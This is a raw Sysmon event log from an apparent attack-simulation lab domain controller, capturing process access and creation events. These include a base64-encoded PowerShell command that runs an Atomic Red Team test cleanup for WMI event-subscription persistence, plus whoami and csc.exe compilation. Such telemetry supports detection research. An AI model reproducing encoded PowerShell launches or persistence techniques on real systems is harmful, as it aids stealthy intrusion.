13:54:47.874{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006119Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.874{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85A7-5FCF-FB00-000000009101}4180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006118Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.874{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006117Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.874{10ACEC4A-85A7-5FCF-FA00-000000009101}16041168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-85A7-5FCF-FB00-000000009101}4180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006116Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.885{10ACEC4A-85A7-5FCF-FB00-000000009101}4180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESB05F.tmp" "c:\Users\Administrator\AppData\Local\Temp\h3qptm12\CSCA52D1F163853423D8A2BE590DF99C37A.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A6-5FCF-374B-090000000000}0x94b370HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-85A7-5FCF-FA00-000000009101}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\h3qptm12\h3qptm12.cmdline" 10341000x80000000000000006115Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.811{10ACEC4A-85A6-5FCF-F000-000000009101}48361104C:\Windows\system32\conhost.exe{10ACEC4A-85A7-5FCF-FA00-000000009101}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006114Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.811{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006113Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.811{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006112Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.811{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006111Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.811{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006110Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.811{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006109Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.811{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006108Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.811{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006107Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.811{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006106Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.811{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006105Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.811{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85A7-5FCF-FA00-000000009101}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006104Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.811{10ACEC4A-85A7-5FCF-F700-000000009101}8164316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A7-5FCF-FA00-000000009101}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\fec023c8de0ed58c816cd442e3b4ddfe\Microsoft.PowerShell.Commands.Utility.ni.dll+140(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\fec023c8de0ed58c816cd442e3b4ddfe\Microsoft.PowerShell.Commands.Utility.ni.dll+140(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662773bc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662553c1(wow64) 154100x80000000000000006103Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.824{10ACEC4A-85A7-5FCF-FA00-000000009101}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\h3qptm12\h3qptm12.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A6-5FCF-374B-090000000000}0x94b370HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEMAbABlAGEAbgB1AHAA 11241100x80000000000000006102Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.811{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\h3qptm12\h3qptm12.cmdline2020-12-08 13:54:47.811 11241100x80000000000000006101Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:47.811{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\h3qptm12\h3qptm12.dll2020-12-08 13:54:47.811 10341000x80000000000000006100Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-85A6-5FCF-F000-000000009101}48361104C:\Windows\system32\conhost.exe{10ACEC4A-85A7-5FCF-F900-000000009101}4592C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006099Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006098Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006097Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006096Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 